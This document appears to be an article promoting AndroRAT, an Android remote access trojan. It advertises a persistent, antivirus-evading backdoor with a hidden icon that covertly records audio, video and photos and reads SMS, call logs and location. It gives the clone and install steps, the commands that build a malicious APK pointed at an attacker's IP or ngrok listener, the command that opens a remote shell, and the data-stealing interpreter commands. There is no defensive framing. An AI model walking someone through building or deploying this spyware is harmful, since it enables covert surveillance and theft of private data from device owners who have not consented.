AndroRAT, short for Android Remote Administration Tool, is a software that allows remote access and control of an Android device. Developed in Java for the client side and Python for the server side, AndroRAT is a powerful tool for gaining access to sensitive information on an Android device.
AndroRAT is compatible with Android versions 4.1 (Jelly Bean) to 9.0 (Oreo) (API 16 to API 28), and also works on Android 10 (Q) but with some unstable interpreter commands.
AndroRAT offers a wide range of features that make it a powerful remote administration tool. Some of its key features include:
- Full persistent backdoor
- Fully undetectable by any antivirus scanner VirusTotal
- Invisible icon on install
- Lightweight APK that runs 24/7 in the background
- App starts automatically on boot up
- Can record audio, video, and take pictures from both cameras
- Browse call logs and SMS logs
- Get current location, SIM card details, IP, and MAC address of the device
To use AndroRAT, you will need to have Python3 and JAVA (or Android Studio) installed on your computer.
Installing AndroRAT is a straightforward process that can be done by following these steps:
- Clone the repository using the command: git clone https://github.com/karma9874/AndroRAT.git
- Change the directory to AndroRAT: cd AndroRAT
- Install the requirements: pip install -r requirements.txt
Note: If you are using Git bash on Windows and you get the error “unable to create file: Filename too long,” you can circumvent this by setting core.longpaths to true. You can do this by running the command: git config –system core.longpaths true
You must run Git bash with administrator privileges.
Once AndroRAT is installed, you can use it in two different modes: Build and Shell.
Build mode: This mode allows you to build the APK file that will be used to install the AndroRAT client on the target device. You can use the command “python3 androRAT.py –build –ngrok” to build the APK and set the listener, or “python3 androRAT.py –build -i 192.169.x.x -p 8000” to build the APK with a specific IP and port.
Shell mode: This mode allows you to get an interactive shell of the device and run various commands to retrieve information from the device. You can use the command “python3 androRAT.py –shell -i 192.169.x.x -p 8000” to start the shell.
Commands that can run on the interpreter
AndroRAT offers a wide range of commands that can be run on the interpreter to retrieve information from the target device. Some of these commands include:
- deviceinfo: Returns basic info of the device
- camList: Returns camera ID
- takepic [cameraID]: Takes a picture from the camera
- startVideo [cameraID]: Starts recording a video
- stopVideo: Stops recording a video and return the video file
- startAudio: Starts recording audio
- stopAudio: Stops recording audio
- getSMS [inbox|sent]: Returns inbox SMS or sent SMS in a file